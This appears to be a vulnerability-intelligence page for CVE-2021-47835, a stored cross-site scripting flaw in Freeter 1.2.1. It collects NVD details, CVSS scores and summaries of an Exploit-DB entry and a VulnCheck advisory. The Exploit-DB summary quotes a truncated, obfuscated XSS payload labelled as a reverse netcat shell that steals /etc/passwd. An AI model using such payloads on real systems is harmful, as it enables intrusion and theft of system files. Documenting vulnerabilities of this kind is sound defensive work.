I. CVE-2021-47835 Basic Information
Vulnerability information
# Freeter 1.2.1 Persistent XSS Vulnerability

N/A

Shenlong assessment

Web-class vulnerability: Unknown

Reasoning:

N/A
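Vulnerability title
Freeter 1.2.1 - Persistent Cross-Site Scripting
Source: U.S. National Vulnerability Database (NVD)
Vulnerability description
Freeter 1.2.1 contains a persistent cross-site scripting vulnerability that allows attackers to store malicious payloads in custom widget titles and files. Attackers can craft malicious files with embedded scripts that execute when victims interact with the application, potentially enabling remote code execution.
Source: U.S. National Vulnerability Database (NVD)
CVSS information
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Source: U.S. National Vulnerability Database (NVD)
Vulnerability category
Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)
Source: U.S. National Vulnerability Database (NVD)
II. Public PoCs for CVE-2021-47835
# | PoC description | Source link | Shenlong link
III. Intelligence on CVE-2021-47835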
  • Title: Freeter 1.2.1 - Persistent Cross-Site Scripting - Multiple webapps Exploit -- 🔗 Source link

    Tags: exploit

    Shenlong quick read:
    ### Key information
    
    - **Vulnerability title**: Freeter 1.2.1 - Persistent Cross-Site Scripting
    - **EDB-ID**: 49833
    - **Exploit author**: TaurusOmar
    - **Vulnerability type**: WEBAPPS
    - **Platform**: MULTIPLE
    - **Date**: 2021-05-05
    - **CVE ID**: N/A
    - **CVSS score**: 8.8 (High)
    - **Vendor homepage**: https://freeter.io/
    - **Version**: 1.2.1
    - **Tested on**: Windows, Linux, MacOS
    
    ### Attack payload sample
    
    ```markdown
    # Payload 2: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
    
    <audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,101,114,114,99,61,120,32,111,116
    ```
    
    ### Description
    
    This is an XSS exploit against Freeter 1.2.1, allowing an attacker to execute arbitrary JavaScript code on the target's browser, potentially leading to unauthorized actions such as stealing sensitive information or controlling the user's session.
  • Title: - GIF - Imgur -- 🔗 Source link

    Tags: exploit

    Shenlong quick read:
    - Page: Imgur
    - Date: May 5, 2021
    - Views: 218
    
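  • Title: The Organizer for Those Who Do — Freeter -- 🔗 Source link

    Tags: product

    Shenlong quick read:
    The screenshot of this page does not directly show any key information about the vulnerability. The page mainly presents the features of the Freeter application, including workflow management, project organization, widgets, and privacy protection.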
  • Title: Freeter 1.2.1 - Persistent Cross-Site Scripting | Advisories | VulnCheck -- 🔗 Source link

    Tags: third-party-advisory

    Shenlong quick read:
    ## Key vulnerability information
    
    - **Vulnerability name**: Freeter 1.2.1 - Persistent Cross-Site Scripting
    - **Severity**: Medium
    - **Date**: January 16, 2026
    - **Affected version**: Freeter 1.2.1
    - **CVE reference**: CVE-2021-47835
    - **CVE description**: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
    - **CVSS score**: 4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
    - **Related links**:
      - [ExploitDB-49833](#)
      - [Official Freeter Product Homepage](#)
      - [Proof of Concept Video](#)
    - **Discovered by**: TaurusOmar
    - **Vulnerability description**:
      Freeter 1.2.1 contains a persistent cross-site scripting vulnerability that allows attackers to store malicious payloads in custom widget titles and files. Attackers can craft malicious files with embedded scripts that execute when victims interact with the application, potentially enabling remote code execution.
  • https://nvd.nist.gov/vuln/detail/CVE-2021-47835